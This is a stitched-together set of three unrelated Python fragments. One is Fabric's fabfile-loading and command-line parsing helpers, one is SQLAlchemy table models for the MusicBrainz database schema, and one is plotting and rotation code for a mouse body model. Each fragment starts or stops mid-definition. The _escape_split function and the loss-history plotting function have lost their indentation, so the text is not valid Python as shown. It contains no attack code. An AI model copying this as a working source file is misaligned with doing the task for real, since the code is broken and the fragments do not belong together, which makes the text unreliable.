    if os.path.dirname(names[0]):
        # Explicit path given: expand '~' markers and test directly
        for name in names:
            expanded = os.path.expanduser(name)
            if os.path.exists(expanded):
                if name.endswith('.py') or _is_package(expanded):
                    return os.path.abspath(expanded)
    else:
        # Bare filename: walk upward from cwd towards the filesystem root
        path = '.'
        # os.path.split(...)[1] becomes empty once we fall off the root,
        # which terminates the walk platform-agnostically
        while os.path.split(os.path.abspath(path))[1]:
            for name in names:
                candidate = os.path.join(path, name)
                if os.path.exists(candidate):
                    if name.endswith('.py') or _is_package(candidate):
                        return os.path.abspath(candidate)
            path = os.path.join('..', path)
    # Implicit 'return None' if nothing was found
def is_task(tup):
    """
    Takes (name, object) tuple, returns True if it's a non-Fab public callable.
    """
    name, func = tup
    # Must be callable, not part of Fabric's own API surface, and public
    if not callable(func):
        return False
    if func in _internals:
        return False
    return not name.startswith('_')
def load_fabfile(path, importer=None):
    """
    Import given fabfile path and return (docstring, callables).

    Specifically, the fabfile's ``__doc__`` attribute (a string) and a
    dictionary of ``{'name': callable}`` containing all callables which pass
    the "is a Fabric task" test.

    ``importer`` defaults to the builtin ``__import__`` and exists mainly so
    tests can substitute a fake importer.
    """
    if importer is None:
        importer = __import__
    # Get directory and fabfile name
    directory, fabfile = os.path.split(path)
    # If the directory isn't in the PYTHONPATH, add it so our import will work
    added_to_path = False
    index = None
    if directory not in sys.path:
        sys.path.insert(0, directory)
        added_to_path = True
    # If the directory IS in the PYTHONPATH, move it to the front temporarily,
    # otherwise other fabfiles -- like Fabric's own -- may scoop the intended
    # one.
    else:
        i = sys.path.index(directory)
        if i != 0:
            # Store index for later restoration
            index = i
            # Add to front, then remove from original position
            sys.path.insert(0, directory)
            del sys.path[i + 1]
    # Perform the import (trimming off the .py)
    imported = importer(os.path.splitext(fabfile)[0])
    # Remove directory from path if we added it ourselves (just to be neat)
    if added_to_path:
        del sys.path[0]
    # Put back in original index if we moved it
    if index is not None:
        sys.path.insert(index + 1, directory)
        del sys.path[0]
    # Return our two-tuple: filter the module namespace down to task callables
    tasks = dict(filter(is_task, vars(imported).items()))
    return imported.__doc__, tasks
def parse_options():
    """
    Handle command-line options with optparse.OptionParser.

    Return list of arguments, largely for use in `parse_arguments`.
    (Concretely, returns the three-tuple ``(parser, opts, args)`` — see the
    final comment below.)
    """
    #
    # Initialize
    #
    parser = OptionParser(usage="fab [options] <command>[:arg1,arg2=val2,host=foo,hosts='h1;h2',...] ...")
    #
    # Define options that don't become `env` vars (typically ones which cause
    # Fabric to do something other than its normal execution, such as --version)
    #
    # Version number (optparse gives you --version but we have to do it
    # ourselves to get -V too. sigh)
    parser.add_option('-V', '--version',
        action='store_true',
        dest='show_version',
        default=False,
        help="show program's version number and exit"
    )
    # List Fab commands found in loaded fabfiles/source files
    parser.add_option('-l', '--list',
        action='store_true',
        dest='list_commands',
        default=False,
        help="print list of possible commands and exit"
    )
    # Like --list, but text processing friendly
    parser.add_option('--shortlist',
        action='store_true',
        dest='shortlist',
        default=False,
        help="print non-verbose list of possible commands and exit"
    )
    # Display info about a specific command
    parser.add_option('-d', '--display',
        metavar='COMMAND',
        help="print detailed info about a given command and exit"
    )
    #
    # Add in options which are also destined to show up as `env` vars.
    # Each entry of env_options is a pre-built optparse Option object;
    # registration order here determines --help ordering.
    #
    for option in env_options:
        parser.add_option(option)
    #
    # Finalize
    #
    # Return three-tuple of parser + the output from parse_args (opt obj, args)
    opts, args = parser.parse_args()
    return parser, opts, args
def _command_names():
    # Iterating a dict yields its keys, so this equals sorted(commands.keys())
    return sorted(commands)
def list_commands(docstring):
    """
    Print all found commands/tasks, then exit. Invoked with ``-l/--list.``

    If ``docstring`` is non-empty, it will be printed before the task list.

    Fixes: the original relied on the Python-2-only ``reduce`` builtin and on
    ``filter`` returning an indexable list; both replaced with forms that work
    on Python 2 and 3 without behavior change.
    """
    if docstring:
        trailer = "\n" if not docstring.endswith("\n") else ""
        print(docstring + trailer)
    print("Available commands:\n")
    # Want separator between name, description to be straight col
    # (the [0] seed keeps this safe when no commands are loaded)
    max_len = max([0] + [len(name) for name in commands])
    sep = ' '
    trail = '...'
    for name in _command_names():
        output = None
        # Print first line of docstring
        func = commands[name]
        if func.__doc__:
            # List comprehension instead of filter(): py3's filter is lazy/unindexable
            lines = [line for line in func.__doc__.splitlines() if line]
            first_line = lines[0].strip()
            # Truncate it if it's longer than N chars
            size = 75 - (max_len + len(sep) + len(trail))
            if len(first_line) > size:
                first_line = first_line[:size] + trail
            output = name.ljust(max_len) + sep + first_line
        # Or nothing (so just the name)
        else:
            output = name
        print(indent(output))
    sys.exit(0)
def shortlist():
    """
    Print all task names separated by newlines with no embellishment.
    """
    # Single print keeps output identical even when there are zero commands
    listing = "\n".join(_command_names())
    print(listing)
    sys.exit(0)
def display_command(command):
    """
    Print command function's docstring, then exit. Invoked with -d/--display.
    """
    # Sanity check
    if command not in commands:
        abort("Command '%s' not found, exiting." % command)
    cmd = commands[command]
    docstring = cmd.__doc__
    if not docstring:
        # No docstring to show for this command
        print("No detailed information available for command '%s':" % command)
    else:
        # Nicely presented docstring, framed by blank lines
        print("Displaying detailed information for command '%s':" % command)
        print('')
        print(indent(docstring, strip=True))
        print('')
    sys.exit(0)
def _escape_split(sep, argstr):
"""
Allows for escaping of the separator: e.g. task:arg='foo\, bar'
It should be noted that the way bash et. al. do command line parsing, those
single quotes are required.
"""
escaped_sep = r'\%s' % sep
if escaped_sep not in argstr:
return argstr.split(sep)
before, _, after = argstr.partition(escaped_sep)
startlist = before.split(sep) # a regular split is fine here
unfinished = startlist[-1]
startlist = startlist[:-1]
# recurse because there may be more escaped separators
endlist = _escape_split(sep, after)
# finish building the escaped value. we use endlist[0] becaue the first
# part of the string sent in recursion is the rest of the escaped value.
unfinished += sep + endlist[0]
return startlist + [unfinished] + endlist[1:] # put together all the parts
def parse_arguments(arguments):
    """
    Parse string list into list of tuples: command, args, kwargs, hosts, roles.

    See docs/usage/fab.rst, section on "per-task arguments" for details.
    """
    parsed = []
    for spec in arguments:
        positional = []
        keyword = {}
        hosts = []
        roles = []
        if ':' in spec:
            spec, argstr = spec.split(':', 1)
            for pair in _escape_split(',', argstr):
                key, eq, value = pair.partition('=')
                if not eq:
                    # No '=' present: treat the whole token as a positional arg
                    positional.append(key)
                # host/hosts/role/roles kwargs are intercepted, not passed through
                elif key == 'host':
                    hosts = [value.strip()]
                elif key == 'hosts':
                    hosts = [h.strip() for h in value.split(';')]
                elif key == 'role':
                    roles = [value.strip()]
                elif key == 'roles':
                    roles = [r.strip() for r in value.split(';')]
                else:
                    keyword[key] = value
        parsed.append((spec, positional, keyword, hosts, roles))
    return parsed
def parse_remainder(arguments):
    """
    Merge list of "remainder arguments" into a single command string.
    """
    merged = ' '.join(arguments)
    return merged
def _merge(hosts, roles):
| |
Integer, ForeignKey(apply_schema('series.id', 'musicbrainz'), name='series_tag_raw_fk_series'), primary_key=True, nullable=False)
editor_id = Column('editor', Integer, ForeignKey(apply_schema('editor.id', 'musicbrainz'), name='series_tag_raw_fk_editor'), primary_key=True, nullable=False)
tag_id = Column('tag', Integer, ForeignKey(apply_schema('tag.id', 'musicbrainz'), name='series_tag_raw_fk_tag'), primary_key=True, nullable=False)
is_upvote = Column(Boolean, default=True, server_default=sql.true(), nullable=False)
series = relationship('Series', foreign_keys=[series_id], innerjoin=True)
editor = relationship('Editor', foreign_keys=[editor_id], innerjoin=True)
tag = relationship('Tag', foreign_keys=[tag_id], innerjoin=True)
class Tag(Base):
    """A folksonomy tag: a unique name plus a usage reference count."""
    __tablename__ = 'tag'
    __table_args__ = (
        Index('tag_idx_name', 'name', unique=True),
        {'schema': mbdata.config.schemas.get('musicbrainz', 'musicbrainz')}
    )
    id = Column(Integer, primary_key=True)
    name = Column(String(255), nullable=False)
    # How many places reference this tag; defaults to 0 both client- and server-side
    ref_count = Column(Integer, default=0, server_default=sql.text('0'), nullable=False)
class TagRelation(Base):
    """A weighted link between two tags; the (tag1, tag2) pair forms the composite PK."""
    __tablename__ = 'tag_relation'
    __table_args__ = (
        {'schema': mbdata.config.schemas.get('musicbrainz', 'musicbrainz')}
    )
    tag1_id = Column('tag1', Integer, ForeignKey(apply_schema('tag.id', 'musicbrainz'), name='tag_relation_fk_tag1'), primary_key=True, nullable=False)
    tag2_id = Column('tag2', Integer, ForeignKey(apply_schema('tag.id', 'musicbrainz'), name='tag_relation_fk_tag2'), primary_key=True, nullable=False)
    # Relative strength of the relation between the two tags
    weight = Column(Integer, nullable=False)
    last_updated = Column(DateTime(timezone=True), server_default=sql.func.now())
    tag1 = relationship('Tag', foreign_keys=[tag1_id], innerjoin=True)
    tag2 = relationship('Tag', foreign_keys=[tag2_id], innerjoin=True)
class Track(Base):
    """One track on a medium: its position, number and name, linked to a
    recording and an artist credit."""
    __tablename__ = 'track'
    __table_args__ = (
        Index('track_idx_gid', 'gid', unique=True),
        Index('track_idx_recording', 'recording'),
        Index('track_idx_name', 'name'),
        Index('track_idx_artist_credit', 'artist_credit'),
        {'schema': mbdata.config.schemas.get('musicbrainz', 'musicbrainz')}
    )
    id = Column(Integer, primary_key=True)
    # Stable public identifier (MBID); uniquely indexed above
    gid = Column(UUID, nullable=False)
    recording_id = Column('recording', Integer, ForeignKey(apply_schema('recording.id', 'musicbrainz'), name='track_fk_recording'), nullable=False)
    medium_id = Column('medium', Integer, ForeignKey(apply_schema('medium.id', 'musicbrainz'), name='track_fk_medium'), nullable=False)
    # Numeric ordering on the medium; `number` is the free-form printed label (e.g. 'A1')
    position = Column(Integer, nullable=False)
    number = Column(String, nullable=False)
    name = Column(String, nullable=False)
    artist_credit_id = Column('artist_credit', Integer, ForeignKey(apply_schema('artist_credit.id', 'musicbrainz'), name='track_fk_artist_credit'), nullable=False)
    # Track duration — presumably milliseconds, as elsewhere in this schema; verify
    length = Column(Integer)
    edits_pending = Column(Integer, default=0, server_default=sql.text('0'), nullable=False)
    last_updated = Column(DateTime(timezone=True), server_default=sql.func.now())
    is_data_track = Column(Boolean, default=False, server_default=sql.false(), nullable=False)
    recording = relationship('Recording', foreign_keys=[recording_id], innerjoin=True)
    # Backref gives Medium.tracks, ordered by track position
    medium = relationship('Medium', foreign_keys=[medium_id], innerjoin=True, backref=backref('tracks', order_by="Track.position"))
    artist_credit = relationship('ArtistCredit', foreign_keys=[artist_credit_id], innerjoin=True)
class TrackGIDRedirect(Base):
    """Maps an obsolete track MBID (gid) to the current Track row.

    NOTE(review): rows presumably appear when tracks are merged or removed —
    standard MBID-redirect pattern; verify against the schema docs.
    """
    __tablename__ = 'track_gid_redirect'
    __table_args__ = (
        Index('track_gid_redirect_idx_new_id', 'new_id'),
        {'schema': mbdata.config.schemas.get('musicbrainz', 'musicbrainz')}
    )
    gid = Column(UUID, primary_key=True, nullable=False)
    redirect_id = Column('new_id', Integer, ForeignKey(apply_schema('track.id', 'musicbrainz'), name='track_gid_redirect_fk_new_id'), nullable=False)
    created = Column(DateTime(timezone=True), server_default=sql.func.now())
    redirect = relationship('Track', foreign_keys=[redirect_id], innerjoin=True)
    @hybrid_property
    def new_id(self):
        # Alias matching the raw column name 'new_id'
        return self.redirect_id
    @hybrid_property
    def track(self):
        # Convenience alias for the Track this gid now resolves to
        return self.redirect
class TrackRaw(Base):
    """An unverified, user-submitted track belonging to a raw release (release_raw)."""
    __tablename__ = 'track_raw'
    __table_args__ = (
        Index('track_raw_idx_release', 'release'),
        {'schema': mbdata.config.schemas.get('musicbrainz', 'musicbrainz')}
    )
    id = Column(Integer, primary_key=True)
    release_id = Column('release', Integer, ForeignKey(apply_schema('release_raw.id', 'musicbrainz'), name='track_raw_fk_release'), nullable=False)
    title = Column(String(255), nullable=False)
    # Free-form artist string; may be absent when inherited from the release
    artist = Column(String(255))
    # Ordering of the track within the raw release
    sequence = Column(Integer, nullable=False)
    release = relationship('ReleaseRaw', foreign_keys=[release_id], innerjoin=True)
class MediumIndex(Base):
    """Lookup index for a medium's disc TOC (one row per medium)."""
    __tablename__ = 'medium_index'
    __table_args__ = (
        Index('medium_index_idx', 'toc'),
        {'schema': mbdata.config.schemas.get('musicbrainz', 'musicbrainz')}
    )
    medium_id = Column('medium', Integer, ForeignKey(apply_schema('medium.id', 'musicbrainz'), name='medium_index_fk_medium', ondelete='CASCADE'), primary_key=True)
    # NOTE(review): Cube is presumably the PostgreSQL cube extension type — confirm.
    toc = Column(Cube)
    medium = relationship('Medium', foreign_keys=[medium_id])
class URL(Base):
    """A URL entity; both the MBID and the URL string itself are unique."""
    __tablename__ = 'url'
    __table_args__ = (
        Index('url_idx_gid', 'gid', unique=True),
        Index('url_idx_url', 'url', unique=True),
        {'schema': mbdata.config.schemas.get('musicbrainz', 'musicbrainz')}
    )
    id = Column(Integer, primary_key=True)
    gid = Column(UUID, nullable=False)
    url = Column(String, nullable=False)
    edits_pending = Column(Integer, default=0, server_default=sql.text('0'), nullable=False)
    last_updated = Column(DateTime(timezone=True), server_default=sql.func.now())
class URLGIDRedirect(Base):
    """Maps a retired URL MBID (gid) to the URL it now redirects to."""
    __tablename__ = 'url_gid_redirect'
    __table_args__ = (
        Index('url_gid_redirect_idx_new_id', 'new_id'),
        {'schema': mbdata.config.schemas.get('musicbrainz', 'musicbrainz')}
    )
    gid = Column(UUID, primary_key=True, nullable=False)
    # DB column is 'new_id'; exposed as redirect_id, with a hybrid alias below.
    redirect_id = Column('new_id', Integer, ForeignKey(apply_schema('url.id', 'musicbrainz'), name='url_gid_redirect_fk_new_id'), nullable=False)
    created = Column(DateTime(timezone=True), server_default=sql.func.now())
    redirect = relationship('URL', foreign_keys=[redirect_id], innerjoin=True)
    @hybrid_property
    def new_id(self):
        # Backward-compatible alias for the raw column name.
        return self.redirect_id
    @hybrid_property
    def url(self):
        # Convenience alias for the redirect target.
        return self.redirect
class Vote(Base):
    """An editor's vote on an edit; superseded marks replaced votes."""
    __tablename__ = 'vote'
    __table_args__ = (
        Index('vote_idx_edit', 'edit'),
        Index('vote_idx_editor_vote_time', 'editor', 'vote_time'),
        Index('vote_idx_editor_edit', 'editor', 'edit'),
        Index('vote_idx_vote_time', 'vote_time'),
        {'schema': mbdata.config.schemas.get('musicbrainz', 'musicbrainz')}
    )
    id = Column(Integer, primary_key=True)
    editor_id = Column('editor', Integer, ForeignKey(apply_schema('editor.id', 'musicbrainz'), name='vote_fk_editor'), nullable=False)
    edit_id = Column('edit', Integer, ForeignKey(apply_schema('edit.id', 'musicbrainz'), name='vote_fk_edit'), nullable=False)
    vote = Column(SMALLINT, nullable=False)
    vote_time = Column(DateTime(timezone=True), server_default=sql.func.now())
    superseded = Column(Boolean, default=False, server_default=sql.false(), nullable=False)
    editor = relationship('Editor', foreign_keys=[editor_id], innerjoin=True)
    edit = relationship('Edit', foreign_keys=[edit_id], innerjoin=True)
class Work(Base):
    """A work entity (composition etc.) with an optional type."""
    __tablename__ = 'work'
    __table_args__ = (
        Index('work_idx_gid', 'gid', unique=True),
        Index('work_idx_name', 'name'),
        {'schema': mbdata.config.schemas.get('musicbrainz', 'musicbrainz')}
    )
    id = Column(Integer, primary_key=True)
    gid = Column(UUID, nullable=False)
    name = Column(String, nullable=False)
    # DB column is 'type'; renamed to avoid shadowing the relationship below.
    type_id = Column('type', Integer, ForeignKey(apply_schema('work_type.id', 'musicbrainz'), name='work_fk_type'))
    comment = Column(String(255), default='', server_default=sql.text("''"), nullable=False)
    edits_pending = Column(Integer, default=0, server_default=sql.text('0'), nullable=False)
    last_updated = Column(DateTime(timezone=True), server_default=sql.func.now())
    type = relationship('WorkType', foreign_keys=[type_id])
class WorkLanguage(Base):
    """Association of a work with a lyrics language (composite PK)."""
    __tablename__ = 'work_language'
    # NOTE(review): parenthesized single dict, not a tuple — SQLAlchemy accepts
    # a plain dict for __table_args__, so this is valid as written.
    __table_args__ = (
        {'schema': mbdata.config.schemas.get('musicbrainz', 'musicbrainz')}
    )
    work_id = Column('work', Integer, ForeignKey(apply_schema('work.id', 'musicbrainz'), name='work_language_fk_work'), primary_key=True, nullable=False)
    language_id = Column('language', Integer, ForeignKey(apply_schema('language.id', 'musicbrainz'), name='work_language_fk_language'), primary_key=True, nullable=False)
    edits_pending = Column(Integer, default=0, server_default=sql.text('0'), nullable=False)
    created = Column(DateTime(timezone=True), server_default=sql.func.now())
    work = relationship('Work', foreign_keys=[work_id], innerjoin=True)
    language = relationship('Language', foreign_keys=[language_id], innerjoin=True)
class WorkRatingRaw(Base):
    """Per-editor raw rating of a work (composite PK work+editor)."""
    __tablename__ = 'work_rating_raw'
    __table_args__ = (
        {'schema': mbdata.config.schemas.get('musicbrainz', 'musicbrainz')}
    )
    work_id = Column('work', Integer, ForeignKey(apply_schema('work.id', 'musicbrainz'), name='work_rating_raw_fk_work'), primary_key=True, nullable=False)
    editor_id = Column('editor', Integer, ForeignKey(apply_schema('editor.id', 'musicbrainz'), name='work_rating_raw_fk_editor'), primary_key=True, nullable=False)
    rating = Column(SMALLINT, nullable=False)
    work = relationship('Work', foreign_keys=[work_id], innerjoin=True)
    editor = relationship('Editor', foreign_keys=[editor_id], innerjoin=True)
class WorkTagRaw(Base):
    """Per-editor raw tag on a work; is_upvote distinguishes up/down votes."""
    __tablename__ = 'work_tag_raw'
    __table_args__ = (
        Index('work_tag_raw_idx_tag', 'tag'),
        {'schema': mbdata.config.schemas.get('musicbrainz', 'musicbrainz')}
    )
    work_id = Column('work', Integer, ForeignKey(apply_schema('work.id', 'musicbrainz'), name='work_tag_raw_fk_work'), primary_key=True, nullable=False)
    editor_id = Column('editor', Integer, ForeignKey(apply_schema('editor.id', 'musicbrainz'), name='work_tag_raw_fk_editor'), primary_key=True, nullable=False)
    tag_id = Column('tag', Integer, ForeignKey(apply_schema('tag.id', 'musicbrainz'), name='work_tag_raw_fk_tag'), primary_key=True, nullable=False)
    is_upvote = Column(Boolean, default=True, server_default=sql.true(), nullable=False)
    work = relationship('Work', foreign_keys=[work_id], innerjoin=True)
    editor = relationship('Editor', foreign_keys=[editor_id], innerjoin=True)
    tag = relationship('Tag', foreign_keys=[tag_id], innerjoin=True)
class WorkAliasType(Base):
    """Type of a work alias; self-referential parent forms a type tree."""
    __tablename__ = 'work_alias_type'
    __table_args__ = (
        Index('work_alias_type_idx_gid', 'gid', unique=True),
        {'schema': mbdata.config.schemas.get('musicbrainz', 'musicbrainz')}
    )
    id = Column(Integer, primary_key=True)
    name = Column(String, nullable=False)
    parent_id = Column('parent', Integer, ForeignKey(apply_schema('work_alias_type.id', 'musicbrainz'), name='work_alias_type_fk_parent'))
    child_order = Column(Integer, default=0, server_default=sql.text('0'), nullable=False)
    description = Column(String)
    gid = Column(UUID, nullable=False)
    parent = relationship('WorkAliasType', foreign_keys=[parent_id])
class WorkAlias(Base):
    """Localized alias of a work, with partial begin/end dates."""
    __tablename__ = 'work_alias'
    __table_args__ = (
        Index('work_alias_idx_work', 'work'),
        Index('work_alias_idx_primary', 'work', 'locale', unique=True),
        {'schema': mbdata.config.schemas.get('musicbrainz', 'musicbrainz')}
    )
    id = Column(Integer, primary_key=True)
    work_id = Column('work', Integer, ForeignKey(apply_schema('work.id', 'musicbrainz'), name='work_alias_fk_work'), nullable=False)
    name = Column(String, nullable=False)
    locale = Column(String)
    edits_pending = Column(Integer, default=0, server_default=sql.text('0'), nullable=False)
    last_updated = Column(DateTime(timezone=True), server_default=sql.func.now())
    type_id = Column('type', Integer, ForeignKey(apply_schema('work_alias_type.id', 'musicbrainz'), name='work_alias_fk_type'))
    sort_name = Column(String, nullable=False)
    begin_date_year = Column(SMALLINT)
    begin_date_month = Column(SMALLINT)
    begin_date_day = Column(SMALLINT)
    end_date_year = Column(SMALLINT)
    end_date_month = Column(SMALLINT)
    end_date_day = Column(SMALLINT)
    primary_for_locale = Column(Boolean, default=False, server_default=sql.false(), nullable=False)
    ended = Column(Boolean, default=False, server_default=sql.false(), nullable=False)
    work = relationship('Work', foreign_keys=[work_id], innerjoin=True)
    type = relationship('WorkAliasType', foreign_keys=[type_id])
    # Composite wrappers exposing the three y/m/d columns as PartialDate values.
    begin_date = composite(PartialDate, begin_date_year, begin_date_month, begin_date_day)
    end_date = composite(PartialDate, end_date_year, end_date_month, end_date_day)
class WorkAnnotation(Base):
    """Association of a work with an annotation (composite PK)."""
    __tablename__ = 'work_annotation'
    __table_args__ = (
        {'schema': mbdata.config.schemas.get('musicbrainz', 'musicbrainz')}
    )
    work_id = Column('work', Integer, ForeignKey(apply_schema('work.id', 'musicbrainz'), name='work_annotation_fk_work'), primary_key=True, nullable=False)
    annotation_id = Column('annotation', Integer, ForeignKey(apply_schema('annotation.id', 'musicbrainz'), name='work_annotation_fk_annotation'), primary_key=True, nullable=False)
    work = relationship('Work', foreign_keys=[work_id], innerjoin=True)
    annotation = relationship('Annotation', foreign_keys=[annotation_id], innerjoin=True)
class WorkGIDRedirect(Base):
    """Maps a retired work MBID (gid) to the work it now redirects to."""
    __tablename__ = 'work_gid_redirect'
    __table_args__ = (
        Index('work_gid_redirect_idx_new_id', 'new_id'),
        {'schema': mbdata.config.schemas.get('musicbrainz', 'musicbrainz')}
    )
    gid = Column(UUID, primary_key=True, nullable=False)
    # DB column is 'new_id'; exposed as redirect_id, with a hybrid alias below.
    redirect_id = Column('new_id', Integer, ForeignKey(apply_schema('work.id', 'musicbrainz'), name='work_gid_redirect_fk_new_id'), nullable=False)
    created = Column(DateTime(timezone=True), server_default=sql.func.now())
    redirect = relationship('Work', foreign_keys=[redirect_id], innerjoin=True)
    @hybrid_property
    def new_id(self):
        # Backward-compatible alias for the raw column name.
        return self.redirect_id
    @hybrid_property
    def work(self):
        # Convenience alias for the redirect target.
        return self.redirect
class WorkMeta(Base):
    """Derived rating statistics for a work; row is deleted with the work."""
    __tablename__ = 'work_meta'
    __table_args__ = (
        {'schema': mbdata.config.schemas.get('musicbrainz', 'musicbrainz')}
    )
    id = Column('id', Integer, ForeignKey(apply_schema('work.id', 'musicbrainz'), name='work_meta_fk_id', ondelete='CASCADE'), primary_key=True, nullable=False)
    rating = Column(SMALLINT)
    rating_count = Column(Integer)
    # One-to-one: reachable from Work as `meta` (uselist=False backref).
    work = relationship('Work', foreign_keys=[id], innerjoin=True, backref=backref('meta', uselist=False))
class WorkTag(Base):
    """Aggregated tag count on a work (composite PK work+tag)."""
    __tablename__ = 'work_tag'
    __table_args__ = (
        Index('work_tag_idx_tag', 'tag'),
        {'schema': mbdata.config.schemas.get('musicbrainz', 'musicbrainz')}
    )
    work_id = Column('work', Integer, ForeignKey(apply_schema('work.id', 'musicbrainz'), name='work_tag_fk_work'), primary_key=True, nullable=False)
    tag_id = Column('tag', Integer, ForeignKey(apply_schema('tag.id', 'musicbrainz'), name='work_tag_fk_tag'), primary_key=True, nullable=False)
    count = Column(Integer, nullable=False)
    last_updated = Column(DateTime(timezone=True), server_default=sql.func.now())
    work = relationship('Work', foreign_keys=[work_id], innerjoin=True)
    tag = relationship('Tag', foreign_keys=[tag_id], innerjoin=True)
class WorkType(Base):
    """Type of a work; self-referential parent forms a type tree."""
    __tablename__ = 'work_type'
    __table_args__ = (
        Index('work_type_idx_gid', 'gid', unique=True),
        {'schema': mbdata.config.schemas.get('musicbrainz', 'musicbrainz')}
    )
    id = Column(Integer, primary_key=True)
    name = Column(String(255), nullable=False)
    parent_id = Column('parent', Integer, ForeignKey(apply_schema('work_type.id', 'musicbrainz'), name='work_type_fk_parent'))
    child_order = Column(Integer, default=0, server_default=sql.text('0'), nullable=False)
    description = Column(String)
    gid = Column(UUID, nullable=False)
    parent = relationship('WorkType', foreign_keys=[parent_id])
class WorkAttributeType(Base):
    """Type of a work attribute; free_text marks types with free-form values."""
    __tablename__ = 'work_attribute_type'
    __table_args__ = (
        Index('work_attribute_type_idx_gid', 'gid', unique=True),
        {'schema': mbdata.config.schemas.get('musicbrainz', 'musicbrainz')}
    )
    id = Column(Integer, primary_key=True)
    name = Column(String(255), nullable=False)
    comment = Column(String(255), default='', server_default=sql.text("''"), nullable=False)
    free_text = Column(Boolean, nullable=False)
    parent_id = Column('parent', Integer, ForeignKey(apply_schema('work_attribute_type.id', 'musicbrainz'), name='work_attribute_type_fk_parent'))
    child_order = Column(Integer, default=0, server_default=sql.text('0'), nullable=False)
    description = Column(String)
    gid = Column(UUID, nullable=False)
    parent = relationship('WorkAttributeType', foreign_keys=[parent_id])
class WorkAttributeTypeAllowedValue(Base):
    """One allowed value of a non-free-text work attribute type."""
    __tablename__ = 'work_attribute_type_allowed_value'
    __table_args__ = (
        Index('work_attribute_type_allowed_value_idx_name', 'work_attribute_type'),
        Index('work_attribute_type_allowed_value_idx_gid', 'gid', unique=True),
        {'schema': mbdata.config.schemas.get('musicbrainz', 'musicbrainz')}
    )
    id = Column(Integer, primary_key=True)
    work_attribute_type_id = Column('work_attribute_type', Integer, ForeignKey(apply_schema('work_attribute_type.id', 'musicbrainz'), name='work_attribute_type_allowed_value_fk_work_attribute_type'), nullable=False)
    value = Column(String)
    parent_id = Column('parent', Integer, ForeignKey(apply_schema('work_attribute_type_allowed_value.id', 'musicbrainz'), name='work_attribute_type_allowed_value_fk_parent'))
    child_order = Column(Integer, default=0, server_default=sql.text('0'), nullable=False)
    description = Column(String)
    gid = Column(UUID, nullable=False)
    work_attribute_type = relationship('WorkAttributeType', foreign_keys=[work_attribute_type_id], innerjoin=True)
    parent = relationship('WorkAttributeTypeAllowedValue', foreign_keys=[parent_id])
class WorkAttribute(Base):
    """An attribute attached to a work: either an allowed value or free text."""
    __tablename__ = 'work_attribute'
    __table_args__ = (
        Index('work_attribute_idx_work', 'work'),
        {'schema': mbdata.config.schemas.get('musicbrainz', 'musicbrainz')}
    )
    id = Column(Integer, primary_key=True)
    work_id = Column('work', Integer, ForeignKey(apply_schema('work.id', 'musicbrainz'), name='work_attribute_fk_work'), nullable=False)
    work_attribute_type_id = Column('work_attribute_type', Integer, ForeignKey(apply_schema('work_attribute_type.id', 'musicbrainz'), name='work_attribute_fk_work_attribute_type'), nullable=False)
    # Nullable: free-text attributes store their value in work_attribute_text instead.
    work_attribute_type_allowed_value_id = Column('work_attribute_type_allowed_value', Integer, ForeignKey(apply_schema('work_attribute_type_allowed_value.id', 'musicbrainz'), name='work_attribute_fk_work_attribute_type_allowed_value'))
    work_attribute_text = Column(String)
    work = relationship('Work', foreign_keys=[work_id], innerjoin=True)
    work_attribute_type = relationship('WorkAttributeType', foreign_keys=[work_attribute_type_id], innerjoin=True)
    work_attribute_type_allowed_value = relationship('WorkAttributeTypeAllowedValue', foreign_keys=[work_attribute_type_allowed_value_id])
class ArtType(Base):
    """Cover Art Archive art type; self-referential parent forms a type tree."""
    __tablename__ = 'art_type'
    __table_args__ = (
        Index('art_type_idx_gid', 'gid', unique=True),
        {'schema': mbdata.config.schemas.get('cover_art_archive', 'cover_art_archive')}
    )
    id = Column(Integer, primary_key=True, nullable=False)
    name = Column(String, nullable=False)
    parent_id = Column('parent', Integer, ForeignKey(apply_schema('art_type.id', u'cover_art_archive'), name='art_type_fk_parent'))
    child_order = Column(Integer, default=0, server_default=sql.text('0'), nullable=False)
    description = Column(String)
    gid = Column(UUID, nullable=False)
    parent = relationship('ArtType', foreign_keys=[parent_id])
class ImageType(Base):
| |
= False):
h_C, h_C_new, h_r, h_lamb, h_part,h_step = history[:]
plt.figure()
iters = np.arange(len(h_C))
plt.subplot(6,1,1)
plt.plot(iters,np.log(h_C),':')
#plt.plot(iters,np.log(h_C_new),'o:')
step_logic = np.asarray(h_step) == 1
plt.plot(iters[step_logic],np.log(h_C_new)[step_logic],'og')
plt.plot(iters[~step_logic],np.log(h_C_new)[~step_logic],'or')
plt.legend(("Loss","proposed Loss"))
plt.ylim([None,np.max(np.log(h_C)) + np.std(np.log(h_C))])
plt.ylabel('$\log Loss$')
plt.subplot(6,1,2)
plt.plot(iters,np.log(h_lamb),'o:')
plt.ylabel('$\log\lambda$')
plt.subplot(6,1,3)
plt.plot(np.multiply(h_r,1e3),':o')
plt.ylabel("median residual [mm]")
plt.plot(np.diff(np.multiply(h_r,1e3)),':o')
plt.legend(("absolute","difference"))
# conver the part list to a matrix_diag
part_history = np.asarray(h_part).squeeze(1)
if second:
part_history = part_history[:,10:]
part_history.shape
plt.subplot(6,1,4)
plt.ylabel("xyz history")
plt.plot(part_history[:,[7,8,9]],'o:')
plt.subplot(6,1,5)
plt.ylabel("spine history")
angle_history = part_history[:,[3]]
plt.plot(angle_history,':o')
plt.subplot(6,1,6)
plt.ylabel("angle history")
angle_history = part_history[:,[0,1,2,4,5,6]]
plt.plot(angle_history,':o')
for i in range(6):
plt.subplot(6,1,i+1)
plt.xlim((0,len(h_C)))
plt.show()
# @njit
def rotate_body_model(alpha_body, beta_body, gamma_body):
    """
    Build the rotation matrix R_body for the mouse body model.

    alpha, beta, gamma are rotations around the x, y and z axis respectively;
    the result is the product R_x @ R_y @ R_z of the three basic rotations.
    https://en.wikipedia.org/wiki/Rotation_matrix#Basic_rotations
    """
    ca, sa = np.cos(alpha_body), np.sin(alpha_body)
    cb, sb = np.cos(beta_body), np.sin(beta_body)
    cg, sg = np.cos(gamma_body), np.sin(gamma_body)
    rot_x = np.array([[1., 0., 0.],
                      [0., ca, -sa],
                      [0., sa, ca]])
    rot_y = np.array([[cb, 0., sb],
                      [0., 1., 0.],
                      [-sb, 0., cb]])
    rot_z = np.array([[cg, -sg, 0.],
                      [sg, cg, 0.],
                      [0., 0., 1.]])
    return rot_x @ rot_y @ rot_z
def torch_mouse_body_geometry(part, body_constants):
    """
    Calculate the configuration of the mouse body model.

    Per the original notes: alpha/beta/gamma rotate the hip, s scales the
    spine, and psi/theta/phi rotate the nose/head (pitch and yaw are around
    y and z since the major body axis is x).

